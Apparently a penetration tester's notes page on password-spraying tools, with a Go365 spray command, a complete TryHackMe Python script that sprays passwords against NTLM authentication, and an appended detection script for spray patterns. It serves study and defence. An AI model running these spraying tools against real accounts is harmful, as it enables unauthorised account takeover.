SprayingToolKits
Cons: Does not have an option for IP rotation.
Go365
AWS Gateway option for IP rotation.
Set up the AWS Gateway (read )
One liner
./Go365 -endpoint rst -ul <email_file.txt> -pl <password_list.txt> -d <domain.com> -w 5 -url <aws_url> -o go365.ouputfile
Spray365
InsideTrust - Statistically Likely Usernames
Very useful wordlists with statistically likely usernames. Can be used to identify valid account usernames.
CrackMapExec
For password spraying with CrackMapExec: here .
I used this tool once to conduct a password spray attack against a web application with Net-NTLM application. It worked fairly well! However, we need to modify line 12 in the script Ntlm.py if the web application uses HTTP instead of HTTPS.
DomainPasswordSpray
To conduct a Password Spraying attack against AD from a Windows attack box.
NTLM Authentication Password Spray Script
TryHackMe custom script to conduct a password spray against NTLM authentication.
THM script - python3
#!/usr/bin/python3
import requests
from requests_ntlm import HttpNtlmAuth
import sys, getopt

class NTLMSprayer:
    def __init__(self, fqdn):
        self.HTTP_AUTH_FAILED_CODE = 401
        self.HTTP_AUTH_SUCCEED_CODE = 200
        self.verbose = True
        self.fqdn = fqdn

    def load_users(self, userfile):
        # One username per line; strip CR/LF line endings
        self.users = []
        with open(userfile, 'r') as f:
            for line in f.readlines():
                self.users.append(line.replace("\r", "").replace("\n", ""))

    def password_spray(self, password, url):
        print("[*] Starting passwords spray attack using the following password: " + password)
        count = 0
        for user in self.users:
            # Authenticate as FQDN\user over NTLM
            response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
            if response.status_code == self.HTTP_AUTH_SUCCEED_CODE:
                print("[+] Valid credential pair found! Username: " + user + " Password: " + password)
                count += 1
                continue
            if self.verbose:
                if response.status_code == self.HTTP_AUTH_FAILED_CODE:
                    print("[-] Failed login with Username: " + user)
        print("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")

def main(argv):
    userfile = ''
    fqdn = ''
    password = ''
    attackurl = ''

    try:
        opts, args = getopt.getopt(argv, "hu:f:p:a:", ["userfile=", "fqdn=", "password=", "attackurl="])
    except getopt.GetoptError:
        print("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
        sys.exit(2)

    for opt, arg in opts:
        if opt == '-h':
            print("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
            sys.exit()
        elif opt in ("-u", "--userfile"):
            userfile = str(arg)
        elif opt in ("-f", "--fqdn"):
            fqdn = str(arg)
        elif opt in ("-p", "--password"):
            password = str(arg)
        elif opt in ("-a", "--attackurl"):
            attackurl = str(arg)

    # All four arguments are required
    if len(userfile) > 0 and len(fqdn) > 0 and len(password) > 0 and len(attackurl) > 0:
        # Start attack
        sprayer = NTLMSprayer(fqdn)
        sprayer.load_users(userfile)
        sprayer.password_spray(password, attackurl)
        sys.exit()
    else:
        print("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
        sys.exit(2)

if __name__ == "__main__":
    main(sys.argv[1:])
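The script above tries one password against every account in the list, so on the defending side it shows up as a single source failing logons for many different accounts in a short time. The following is an added example, not part of the original page or the TryHackMe script, of detecting that pattern. The record layout, addresses, account names and thresholds are constructed assumptions; in practice the input would come from failed-logon records such as Windows event 4625.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

T0 = datetime(2024, 1, 1, 9, 0, 0)

def _ev(offset_s, source, user, ok=False):
    # Constructed record: (time, source address, account, logon succeeded)
    return (T0 + timedelta(seconds=offset_s), source, user, ok)

# Constructed sample data, not taken from any real log
SAMPLE_EVENTS = (
    [_ev(2 * i, "10.0.0.50", f"user{i}") for i in range(6)]      # one try per account
    + [_ev(10 * i, "10.0.0.7", "alice") for i in range(3)]        # mistyped password
    + [_ev(i, "10.0.0.9", "bob") for i in range(10)]              # single-account guessing
    + [_ev(3600 * i, "10.0.0.8", f"svc{i}") for i in range(6)]    # one try per hour
)

def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source: [accounts]} for every source whose failed logons hit
    at least min_users distinct accounts inside one sliding time window."""
    recent = defaultdict(deque)   # source -> failures still inside the window
    flagged = {}
    for ts, source, user, ok in sorted(events):
        if ok:
            continue              # only failures count towards a spray
        failures = recent[source]
        failures.append((ts, user))
        # Drop failures that have aged out of the window
        while ts - failures[0][0] > window:
            failures.popleft()
        users = {u for _, u in failures}
        # Many distinct accounts is a spray; many tries on one account is not
        if len(users) >= min_users:
            flagged.setdefault(source, set()).update(users)
    return {source: sorted(users) for source, users in flagged.items()}

if __name__ == "__main__":
    for source, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"{source}: failed logons for {len(users)} accounts: {', '.join(users)}")
```

With the default five-minute window only 10.0.0.50 is reported; the source that makes one attempt per hour is caught only when the window is widened, which is why a long-window count should run alongside the short one.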